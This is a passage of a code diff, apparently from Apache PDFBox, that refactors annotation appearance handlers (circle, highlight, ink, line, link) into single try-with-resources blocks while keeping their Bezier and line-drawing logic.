+ "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", + "- boolean hasBackground = contentStream", + "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- ", + "- setOpacity(contentStream, annotation.getConstantOpacity());", + "- ", + "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", + "- ", + "- // Acrobat applies a padding to each side of the bbox so the line is completely within", + "- // the bbox.", + "- // TODO: Needs validation for Circles as Adobe Reader seems to extend the bbox bei the rect differenve", + "- // for circle annotations.", + "- PDRectangle bbox = getRectangle();", + "- PDRectangle borderEdge = getPaddedRectangle(bbox,lineWidth/2);", + "- ", + "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", + "- {", + "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "- borderEffect.getIntensity(), lineWidth, getRectangle());", + "- cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", + "- annotation.setRectangle(cloudyBorder.getRectangle());", + "- annotation.setRectDifference(cloudyBorder.getRectDifference());", + "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "- appearanceStream.setBBox(cloudyBorder.getBBox());", + "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", + "- }", + "- else", + "- {", + "- // the differences rectangle", + "- setRectDifference(lineWidth);", + "- ", + "- // lower left corner", + "- float x0 = borderEdge.getLowerLeftX();", + "- float y0 = borderEdge.getLowerLeftY();", + "- // upper right corner", + "- float x1 = borderEdge.getUpperRightX();", + "- float y1 = borderEdge.getUpperRightY();", + "- // mid points", + "- float xm = x0 + borderEdge.getWidth() / 2;", + "- float ym = y0 + borderEdge.getHeight() / 2;", + "- // see http://spencermortensen.com/articles/bezier-circle/", + "- // the below number was calculated from sampling content streams", + "- // generated using Adobe Reader", + "- float magic = 0.55555417f;", + "- // control point offsets", + "- float vOffset = borderEdge.getHeight() / 2 * magic;", + "- float hOffset = borderEdge.getWidth() / 2 * magic;", + "- ", + "- contentStream.moveTo(xm, y1);", + "- contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", + "- contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", + "- contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", + "- contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", + "- contentStream.closePath();", + "- }", + "- ", + "- contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + "+ CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", + "+ borderEffect.getIntensity(), lineWidth, getRectangle());", + "+ cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", + "+ annotation.setRectangle(cloudyBorder.getRectangle());", + "+ annotation.setRectDifference(cloudyBorder.getRectDifference());", + "+ PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", + "+ appearanceStream.setBBox(cloudyBorder.getBBox());", + "+ appearanceStream.setMatrix(cloudyBorder.getMatrix());", + " }", + "+ else", + "+ {", + "+ // the differences rectangle", + "+ setRectDifference(lineWidth);", + "+", + "+ // lower left corner", + "+ float x0 = borderEdge.getLowerLeftX();", + "+ float y0 = borderEdge.getLowerLeftY();", + "+ // upper right corner", + "+ float x1 = borderEdge.getUpperRightX();", + "+ float y1 = borderEdge.getUpperRightY();", + "+ // mid points", + "+ float xm = x0 + borderEdge.getWidth() / 2;", + "+ float ym = y0 + borderEdge.getHeight() / 2;", + "+ // see http://spencermortensen.com/articles/bezier-circle/", + "+ // the below number was calculated from sampling content streams", + "+ // generated using Adobe Reader", + "+ float magic = 0.55555417f;", + "+ // control point offsets", + "+ float vOffset = borderEdge.getHeight() / 2 * magic;", + "+ float hOffset = borderEdge.getWidth() / 2 * magic;", + "+", + "+ contentStream.moveTo(xm, y1);", + "+ contentStream.curveTo((xm + hOffset), y1, x1, (ym + vOffset), x1, ym);", + "+ contentStream.curveTo(x1, (ym - vOffset), (xm + hOffset), y0, xm, y0);", + "+ contentStream.curveTo((xm - hOffset), y0, x0, (ym - vOffset), x0, ym);", + "+ contentStream.curveTo(x0, (ym + vOffset), (xm - hOffset), y1, xm, y1);", + "+ contentStream.closePath();", + "+ }", + "+", + "+ contentStream.drawShape(lineWidth, hasStroke, hasBackground);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "index 14cd725bf..095a38ad6 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDHighlightAppearanceHandler.java", + "@@ -109,104 +109,101 @@ public class PDHighlightAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ PDExtendedGraphicsState r0 = new PDExtendedGraphicsState();", + "+ PDExtendedGraphicsState r1 = new PDExtendedGraphicsState();", + "+ r0.setAlphaSourceFlag(false);", + "+ r0.setStrokingAlphaConstant(annotation.getConstantOpacity());", + "+ r0.setNonStrokingAlphaConstant(annotation.getConstantOpacity());", + "+ r1.setAlphaSourceFlag(false);", + "+ r1.setBlendMode(BlendMode.MULTIPLY);", + "+ cs.setGraphicsStateParameters(r0);", + "+ cs.setGraphicsStateParameters(r1);", + "+ //TODO replace with document.getDocument().createCOSStream()", + "+ // or call new PDFormXObject(document)", + "+ PDFormXObject frm1 = new PDFormXObject(new COSStream());", + "+ PDFormXObject frm2 = new PDFormXObject(new COSStream());", + "+ frm1.setResources(new PDResources());", + "+ try (PDFormContentStream mwfofrmCS = new PDFormContentStream(frm1))", + " {", + "- PDExtendedGraphicsState r0 = new PDExtendedGraphicsState();", + "- PDExtendedGraphicsState r1 = new PDExtendedGraphicsState();", + "- r0.setAlphaSourceFlag(false);", + "- r0.setStrokingAlphaConstant(annotation.getConstantOpacity());", + "- r0.setNonStrokingAlphaConstant(annotation.getConstantOpacity());", + "- r1.setAlphaSourceFlag(false);", + "- r1.setBlendMode(BlendMode.MULTIPLY);", + "- cs.setGraphicsStateParameters(r0);", + "- cs.setGraphicsStateParameters(r1);", + "- //TODO replace with document.getDocument().createCOSStream()", + "- // or call new PDFormXObject(document)", + "- PDFormXObject frm1 = new PDFormXObject(new COSStream());", + "- PDFormXObject frm2 = new PDFormXObject(new COSStream());", + "- frm1.setResources(new PDResources());", + "- try (PDFormContentStream mwfofrmCS = new PDFormContentStream(frm1))", + "- {", + "- mwfofrmCS.drawForm(frm2);", + "- }", + "- frm1.setBBox(annotation.getRectangle());", + "- COSDictionary groupDict = new COSDictionary();", + "- groupDict.setItem(COSName.S, COSName.TRANSPARENCY);", + "- //TODO PDFormXObject.setGroup() is missing", + "- frm1.getCOSObject().setItem(COSName.GROUP, groupDict);", + "- cs.drawForm(frm1);", + "- frm2.setBBox(annotation.getRectangle());", + "- try (PDFormContentStream frm2CS = new PDFormContentStream(frm2))", + "+ mwfofrmCS.drawForm(frm2);", + "+ }", + "+ frm1.setBBox(annotation.getRectangle());", + "+ COSDictionary groupDict = new COSDictionary();", + "+ groupDict.setItem(COSName.S, COSName.TRANSPARENCY);", + "+ //TODO PDFormXObject.setGroup() is missing", + "+ frm1.getCOSObject().setItem(COSName.GROUP, groupDict);", + "+ cs.drawForm(frm1);", + "+ frm2.setBBox(annotation.getRectangle());", + "+ try (PDFormContentStream frm2CS = new PDFormContentStream(frm2))", + "+ {", + "+ frm2CS.setNonStrokingColor(color);", + "+ int of = 0;", + "+ while (of + 7 < pathsArray.length)", + " {", + "- frm2CS.setNonStrokingColor(color);", + "- int of = 0;", + "- while (of + 7 < pathsArray.length)", + "+ // quadpoints spec sequence is incorrect, correct one is (4,5 0,1 2,3 6,7)", + "+ // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "+", + "+ // for \"curvy\" highlighting, two B\u00c3\u00a9zier control points are used that seem to have a", + "+ // distance of about 1/4 of the height.", + "+ // note that curves won't appear if outside of the rectangle", + "+ float delta = 0;", + "+ if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0 &&", + "+ Float.compare(pathsArray[of + 1], pathsArray[of + 3]) == 0 &&", + "+ Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0 &&", + "+ Float.compare(pathsArray[of + 5], pathsArray[of + 7]) == 0)", + "+ {", + "+ // horizontal highlight", + "+ delta = (pathsArray[of + 1] - pathsArray[of + 5]) / 4;", + "+ }", + "+ else if (Float.compare(pathsArray[of + 1], pathsArray[of + 5]) == 0 &&", + "+ Float.compare(pathsArray[of + 0], pathsArray[of + 2]) == 0 &&", + "+ Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0 &&", + "+ Float.compare(pathsArray[of + 4], pathsArray[of + 6]) == 0)", + " {", + "- // quadpoints spec sequence is incorrect, correct one is (4,5 0,1 2,3 6,7)", + "- // https://stackoverflow.com/questions/9855814/pdf-spec-vs-acrobat-creation-quadpoints", + "-", + "- // for \"curvy\" highlighting, two B\u00c3\u00a9zier control points are used that seem to have a", + "- // distance of about 1/4 of the height.", + "- // note that curves won't appear if outside of the rectangle", + "- float delta = 0;", + "- if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0 &&", + "- Float.compare(pathsArray[of + 1], pathsArray[of + 3]) == 0 &&", + "- Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0 &&", + "- Float.compare(pathsArray[of + 5], pathsArray[of + 7]) == 0)", + "- {", + "- // horizontal highlight", + "- delta = (pathsArray[of + 1] - pathsArray[of + 5]) / 4;", + "- }", + "- else if (Float.compare(pathsArray[of + 1], pathsArray[of + 5]) == 0 &&", + "- Float.compare(pathsArray[of + 0], pathsArray[of + 2]) == 0 &&", + "- Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0 &&", + "- Float.compare(pathsArray[of + 4], pathsArray[of + 6]) == 0)", + "- {", + "- // vertical highlight", + "- delta = (pathsArray[of + 0] - pathsArray[of + 4]) / 4;", + "- }", + "-", + "- frm2CS.moveTo(pathsArray[of + 4], pathsArray[of + 5]);", + "-", + "- if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0)", + "- {", + "- // horizontal highlight", + "- frm2CS.curveTo(pathsArray[of + 4] - delta, pathsArray[of + 5] + delta,", + "- pathsArray[of + 0] - delta, pathsArray[of + 1] - delta,", + "- pathsArray[of + 0], pathsArray[of + 1]);", + "- }", + "- else if (Float.compare(pathsArray[of + 5], pathsArray[of + 1]) == 0)", + "- {", + "- // vertical highlight", + "- frm2CS.curveTo(pathsArray[of + 4] + delta, pathsArray[of + 5] + delta,", + "- pathsArray[of + 0] - delta, pathsArray[of + 1] + delta,", + "- pathsArray[of + 0], pathsArray[of + 1]);", + "- }", + "- else", + "- {", + "- frm2CS.lineTo(pathsArray[of + 0], pathsArray[of + 1]);", + "- }", + "- frm2CS.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + "- if (Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0)", + "- {", + "- // horizontal highlight", + "- frm2CS.curveTo(pathsArray[of + 2] + delta, pathsArray[of + 3] - delta,", + "- pathsArray[of + 6] + delta, pathsArray[of + 7] + delta,", + "- pathsArray[of + 6], pathsArray[of + 7]);", + "- }", + "- else if (Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0)", + "- {", + "- // vertical highlight", + "- frm2CS.curveTo(pathsArray[of + 2] - delta, pathsArray[of + 3] - delta,", + "- pathsArray[of + 6] + delta, pathsArray[of + 7] - delta,", + "- pathsArray[of + 6], pathsArray[of + 7]);", + "- }", + "- else", + "- {", + "- frm2CS.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", + "- }", + "-", + "- frm2CS.fill();", + "- of += 8;", + "+ // vertical highlight", + "+ delta = (pathsArray[of + 0] - pathsArray[of + 4]) / 4;", + " }", + "+", + "+ frm2CS.moveTo(pathsArray[of + 4], pathsArray[of + 5]);", + "+", + "+ if (Float.compare(pathsArray[of + 0], pathsArray[of + 4]) == 0)", + "+ {", + "+ // horizontal highlight", + "+ frm2CS.curveTo(pathsArray[of + 4] - delta, pathsArray[of + 5] + delta,", + "+ pathsArray[of + 0] - delta, pathsArray[of + 1] - delta,", + "+ pathsArray[of + 0], pathsArray[of + 1]);", + "+ }", + "+ else if (Float.compare(pathsArray[of + 5], pathsArray[of + 1]) == 0)", + "+ {", + "+ // vertical highlight", + "+ frm2CS.curveTo(pathsArray[of + 4] + delta, pathsArray[of + 5] + delta,", + "+ pathsArray[of + 0] - delta, pathsArray[of + 1] + delta,", + "+ pathsArray[of + 0], pathsArray[of + 1]);", + "+ }", + "+ else", + "+ {", + "+ frm2CS.lineTo(pathsArray[of + 0], pathsArray[of + 1]);", + "+ }", + "+ frm2CS.lineTo(pathsArray[of + 2], pathsArray[of + 3]);", + "+ if (Float.compare(pathsArray[of + 2], pathsArray[of + 6]) == 0)", + "+ {", + "+ // horizontal highlight", + "+ frm2CS.curveTo(pathsArray[of + 2] + delta, pathsArray[of + 3] - delta,", + "+ pathsArray[of + 6] + delta, pathsArray[of + 7] + delta,", + "+ pathsArray[of + 6], pathsArray[of + 7]);", + "+ }", + "+ else if (Float.compare(pathsArray[of + 3], pathsArray[of + 7]) == 0)", + "+ {", + "+ // vertical highlight", + "+ frm2CS.curveTo(pathsArray[of + 2] - delta, pathsArray[of + 3] - delta,", + "+ pathsArray[of + 6] + delta, pathsArray[of + 7] - delta,", + "+ pathsArray[of + 6], pathsArray[of + 7]);", + "+ }", + "+ else", + "+ {", + "+ frm2CS.lineTo(pathsArray[of + 6], pathsArray[of + 7]);", + "+ }", + "+", + "+ frm2CS.fill();", + "+ of += 8;", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "index 3b451e5f7..d5c179254 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDInkAppearanceHandler.java", + "@@ -59,37 +59,34 @@ public class PDInkAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ setOpacity(cs, ink.getConstantOpacity());", + "+", + "+ cs.setStrokingColor(color);", + "+ if (ab.dashArray != null)", + " {", + "- setOpacity(cs, ink.getConstantOpacity());", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "- cs.setStrokingColor(color);", + "- if (ab.dashArray != null)", + "- {", + "- cs.setLineDashPattern(ab.dashArray, 0);", + "- }", + "- cs.setLineWidth(ab.width);", + "+ for (float[] pathArray : ink.getInkList())", + "+ {", + "+ int nPoints = pathArray.length / 2;", + "- for (float[] pathArray : ink.getInkList())", + "+ // \"When drawn, the points shall be connected by straight lines or curves ", + "+ // in an implementation-dependent way\" - we do lines.", + "+ for (int i = 0; i < nPoints; ++i)", + " {", + "- int nPoints = pathArray.length / 2;", + "+ float x = pathArray[i * 2];", + "+ float y = pathArray[i * 2 + 1];", + "- // \"When drawn, the points shall be connected by straight lines or curves ", + "- // in an implementation-dependent way\" - we do lines.", + "- for (int i = 0; i < nPoints; ++i)", + "+ if (i == 0)", + " {", + "- float x = pathArray[i * 2];", + "- float y = pathArray[i * 2 + 1];", + "-", + "- if (i == 0)", + "- {", + "- cs.moveTo(x, y);", + "- }", + "- else", + "- {", + "- cs.lineTo(x, y);", + "- }", + "+ cs.moveTo(x, y);", + "+ }", + "+ else", + "+ {", + "+ cs.lineTo(x, y);", + " }", + "- cs.stroke();", + " }", + "+ cs.stroke();", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "index ac6ef2215..00ba5c394 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLineAppearanceHandler.java", + "@@ -105,127 +105,131 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + "- try", + "+ try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream cs = getNormalAppearanceAsContentStream())", + "+ setOpacity(cs, annotation.getConstantOpacity());", + "+", + "+ // Tested with Adobe Reader:", + "+ // text is written first (TODO)", + "+ // width 0 is used by Adobe as such (but results in a visible line in rendering)", + "+ // empty color array results in an invisible line (\"n\" operator) but the rest is visible", + "+ // empty content is like no caption", + "+", + "+ boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "+", + "+ if (ab.dashArray != null)", + " {", + "- setOpacity(cs, annotation.getConstantOpacity());", + "+ cs.setLineDashPattern(ab.dashArray, 0);", + "+ }", + "+ cs.setLineWidth(ab.width);", + "- // Tested with Adobe Reader:", + "- // text is written first (TODO)", + "- // width 0 is used by Adobe as such (but results in a visible line in rendering)", + "- // empty color array results in an invisible line (\"n\" operator) but the rest is visible", + "- // empty content is like no caption", + "+ float x1 = pathsArray[0];", + "+ float y1 = pathsArray[1];", + "+ float x2 = pathsArray[2];", + "+ float y2 = pathsArray[3];", + "- boolean hasStroke = cs.setStrokingColorOnDemand(color);", + "+ // if there are leader lines, then the /L coordinates represent", + "+ // the endpoints of the leader lines rather than the endpoints of the line itself.", + "+ // so for us, llo + ll is the vertical offset for the line.", + "+ float y = llo + ll;", + "- if (ab.dashArray != null)", + "+ String contents = annotation.getContents();", + "+ if (contents == null)", + "+ {", + "+ contents = \"\";", + "+ }", + "+", + "+ double angle = Math.atan2(y2 - y1, x2 - x1);", + "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "+ float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", + "+ if (annotation.hasCaption() && !contents.isEmpty())", + "+ {", + "+ PDType1Font font = PDType1Font.HELVETICA;", + "+ // TODO: support newlines!!!!!", + "+ // see https://www.pdfill.com/example/pdf_commenting_new.pdf", + "+ float contentLength = 0;", + "+ try", + "+ {", + "+ contentLength = font.getStringWidth(annotation.getContents()) / 1000 * FONT_SIZE;", + "+", + "+ //TODO How to decide the size of the font?", + "+ // 9 seems to be standard, but if the text doesn't fit, a scaling is done", + "+ // see AnnotationSample.Standard.pdf, diagonal line", + "+ }", + "+ catch (IllegalArgumentException ex)", + " {", + "- cs.setLineDashPattern(ab.dashArray, 0);", + "+ // Adobe Reader displays placeholders instead", + "+ LOG.error(\"line text '\" + annotation.getContents() + \"' can't be shown\", ex);", + " }", + "- cs.setLineWidth(ab.width);", + "+ float xOffset = (lineLength - contentLength) / 2;", + "+ float yOffset;", + "- float x1 = pathsArray[0];", + "- float y1 = pathsArray[1];", + "- float x2 = pathsArray[2];", + "- float y2 = pathsArray[3];", + "+ // Leader lines", + "+ cs.moveTo(0, llo);", + "+ cs.lineTo(0, llo + ll + lle);", + "+ cs.moveTo(lineLength, llo);", + "+ cs.lineTo(lineLength, llo + ll + lle);", + "- // if there are leader lines, then the /L coordinates represent", + "- // the endpoints of the leader lines rather than the endpoints of the line itself.", + "- // so for us, llo + ll is the vertical offset for the line.", + "- float y = llo + ll;", + "+ String captionPositioning = annotation.getCaptionPositioning();", + "- String contents = annotation.getContents();", + "- if (contents == null)", + "+ // draw the line horizontally, using the rotation CTM to get to correct final position", + "+ // that's the easiest way to calculate the positions for the line before and after inline caption", + "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + " {", + "- contents = \"\";", + "+ cs.moveTo(ab.width, y);", + " }", + "-", + "- double angle = Math.atan2(y2 - y1, x2 - x1);", + "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", + "- float lineLength = (float) Math.sqrt(((x2 - x1) * (x2 - x1)) + ((y2 - y1) * (y2 - y1)));", + "- if (annotation.hasCaption() && !contents.isEmpty())", + "+ else", + "+ {", + "+ cs.moveTo(0, y);", + "+ }", + "+ if (\"Top\".equals(captionPositioning))", + "+ {", + "+ // this arbitrary number is from Adobe", + "+ yOffset = 1.908f;", + "+ }", + "+ else", + " {", + "- PDType1Font font = PDType1Font.HELVETICA;", + "- // TODO: support newlines!!!!!", + "- // see https://www.pdfill.com/example/pdf_commenting_new.pdf", + "- float contentLength = 0;", + "- try", + "- {", + "- contentLength = font.getStringWidth(annotation.getContents()) / 1000 * FONT_SIZE;", + "+ // Inline", + "+ // this arbitrary number is from Adobe", + "+ yOffset = -2.6f;", + "- //TODO How to decide the size of the font?", + "- // 9 seems to be standard, but if the text doesn't fit, a scaling is done", + "- // see AnnotationSample.Standard.pdf, diagonal line", + "- }", + "- catch (IllegalArgumentException ex)", + "- {", + "- // Adobe Reader displays placeholders instead", + "- LOG.error(\"line text '\" + annotation.getContents() + \"' can't be shown\", ex);", + "- }", + "- float xOffset = (lineLength - contentLength) / 2;", + "- float yOffset;", + "- ", + "- // Leader lines", + "- cs.moveTo(0, llo);", + "- cs.lineTo(0, llo + ll + lle);", + "- cs.moveTo(lineLength, llo);", + "- cs.lineTo(lineLength, llo + ll + lle);", + "+ cs.lineTo(xOffset - ab.width, y);", + "+ cs.moveTo(lineLength - xOffset + ab.width, y);", + "+ }", + "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ {", + "+ cs.lineTo(lineLength - ab.width, y);", + "+ }", + "+ else", + "+ {", + "+ cs.lineTo(lineLength, y);", + "+ }", + "+ cs.drawShape(ab.width, hasStroke, false);", + "- String captionPositioning = annotation.getCaptionPositioning();", + "+ // /CO entry (caption offset)", + "+ float captionHorizontalOffset = annotation.getCaptionHorizontalOffset();", + "+ float captionVerticalOffset = annotation.getCaptionVerticalOffset();", + "- // draw the line horizontally, using the rotation CTM to get to correct final position", + "- // that's the easiest way to calculate the positions for the line before and after inline caption", + "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + "- {", + "- cs.moveTo(ab.width, y);", + "- }", + "- else", + "- {", + "- cs.moveTo(0, y);", + "- }", + "- if (\"Top\".equals(captionPositioning))", + "- {", + "- // this arbitrary number is from Adobe", + "- yOffset = 1.908f;", + "- }", + "- else", + "- {", + "- // Inline", + "- // this arbitrary number is from Adobe", + "- yOffset = -2.6f;", + "+ // check contentLength so we don't show if there was trouble before", + "+ if (contentLength > 0)", + "+ {", + "+ cs.beginText();", + "+ cs.setFont(font, FONT_SIZE);", + "+ cs.newLineAtOffset(xOffset + captionHorizontalOffset, ", + "+ y + yOffset + captionVerticalOffset);", + "+ cs.showText(annotation.getContents());", + "+ cs.endText();", + "+ }", + "- cs.lineTo(xOffset - ab.width, y);", + "- cs.moveTo(lineLength - xOffset + ab.width, y);", + "- }", + "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "- {", + "- cs.lineTo(lineLength - ab.width, y);", + "- }", + "- else", + "- {", + "- cs.lineTo(lineLength, y);", + "- }", + "+ if (Float.compare(captionVerticalOffset, 0) != 0)", + "+ {", + "+ // Adobe paints vertical bar to the caption", + "+ cs.moveTo(0 + lineLength / 2, y);", + "+ cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", + " cs.drawShape(ab.width, hasStroke, false);", + "-", + "- // /CO entry (caption offset)", + "- float captionHorizontalOffset = annotation.getCaptionHorizontalOffset();", + "- float captionVerticalOffset = annotation.getCaptionVerticalOffset();", + "-", + "- // check contentLength so we don't show if there was trouble before", + "- if (contentLength > 0)", + "- {", + "- cs.beginText();", + "- cs.setFont(font, FONT_SIZE);", + "- cs.newLineAtOffset(xOffset + captionHorizontalOffset, ", + "- y + yOffset + captionVerticalOffset);", + "- cs.showText(annotation.getContents());", + "- cs.endText();", + "- }", + "-", + "- if (Float.compare(captionVerticalOffset, 0) != 0)", + "- {", + "- // Adobe paints vertical bar to the caption", + "- cs.moveTo(0 + lineLength / 2, y);", + "- cs.lineTo(0 + lineLength / 2, y + captionVerticalOffset);", + "- cs.drawShape(ab.width, hasStroke, false);", + "- }", + "+ }", + "+ }", + "+ else", + "+ {", + "+ if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + "+ {", + "+ cs.moveTo(ab.width, y);", + " }", + "@@ -233,27 +237,20 @@ public class PDLineAppearanceHandler extends PDAbstractAppearanceHandler", + " {", + "- if (SHORT_STYLES.contains(annotation.getStartPointEndingStyle()))", + "- {", + "- cs.moveTo(ab.width, y);", + "- }", + "- else", + "- {", + "- cs.moveTo(0, y);", + "- }", + "- if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "- {", + "- cs.lineTo(lineLength - ab.width, y);", + "- }", + "- else", + "- {", + "- cs.lineTo(lineLength, y);", + "- }", + "- cs.drawShape(ab.width, hasStroke, false);", + "+ cs.moveTo(0, y);", + " }", + "-", + "- // paint the styles here and not before showing the text, or the text would appear", + "- // with the interior color", + "- boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "- drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", + "- drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", + "+ if (SHORT_STYLES.contains(annotation.getEndPointEndingStyle()))", + "+ {", + "+ cs.lineTo(lineLength - ab.width, y);", + "+ }", + "+ else", + "+ {", + "+ cs.lineTo(lineLength, y);", + "+ }", + "+ cs.drawShape(ab.width, hasStroke, false);", + " }", + "+", + "+ // paint the styles here and not before showing the text, or the text would appear", + "+ // with the interior color", + "+ boolean hasBackground = cs.setNonStrokingColorOnDemand(annotation.getInteriorColor());", + "+ drawStyle(annotation.getStartPointEndingStyle(), cs, 0, y, ab.width, hasStroke, hasBackground);", + "+ drawStyle(annotation.getEndPointEndingStyle(), cs, lineLength, y, ab.width, hasStroke, hasBackground);", + " }", + "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "index 95d6bcfeb..37fe5eb52 100644", + "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDLinkAppearanceHandler.java", + "@@ -67,91 +67,88 @@ public class PDLinkAppearanceHandler extends PDAbstractAppearanceHandler", + " float lineWidth = getLineWidth();", + "- try", + "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + " {", + "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", + "+ PDColor color = annotation.getColor();", + "+ if (color == null)", + " {", + "- PDColor color = annotation.getColor();", + "- if (color == null)", + "- {", + "- // spec is unclear, but black is what Adobe does", + "- color = new PDColor(new float[] { 0 }, PDDeviceGray.INSTANCE);", + "- }", + "- boolean hasStroke = contentStream.setStrokingColorOnDemand(color);", + "+ // spec is unclear, but black is what Adobe does", + "+ color = new PDColor(new float[] { 0 }, PDDeviceGray.INSTANCE);", + "+ }", + "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(color);", + "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "- //TODO find better way to do this. Either pass border array to", + "- // setBorderLine(), or use AnnotationBorder class", + "- if (annotation.getBorderStyle() == null)", + "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", + "+ //TODO find better way to do this. Either pass border array to", + "+ // setBorderLine(), or use AnnotationBorder class", + "+ if (annotation.getBorderStyle() == null)", + "+ {", + "+ COSArray border = annotation.getBorder();", + "+ if (border.size() > 3 && border.getObject(3) instanceof COSArray)", + " {", + "- COSArray border = annotation.getBorder();", + "- if (border.size() > 3 && border.getObject(3) instanceof COSArray)", + "- {", + "- contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", + "- }", + "+ contentStream.setLineDashPattern(((COSArray) border.getObject(3)).toFloatArray(), 0);", + " }", + "+ }", + "+", + "+ // the differences rectangle", + "+ // TODO: this only works for border effect solid. Cloudy needs a different approach.", + "+ setRectDifference(lineWidth);", + "- // the differences rectangle", + "- // TODO: this only works for border effect solid. Cloudy needs a different approach.", + "- setRectDifference(lineWidth);", + "- ", + "- // Acrobat applies a padding to each side of the bbox so the line is completely within", + "- // the bbox.", + "- PDRectangle borderEdge = getPaddedRectangle(getRectangle(),lineWidth/2);", + "+ // Acrobat applies a padding to each side of the bbox so the line is completely within", + "+ // the bbox.", + "+ PDRectangle borderEdge = getPaddedRectangle(getRectangle(),lineWidth/2);", + "- float[] pathsArray = annotation.getQuadPoints();", + "+ float[] pathsArray = annotation.getQuadPoints();", + "- if (pathsArray != null)", + "+ if (pathsArray != null)", + "+ {", + "+ // QuadPoints shall be ignored if any coordinate in the array lies outside", + "+ // the region specified by Rect.", + "+ 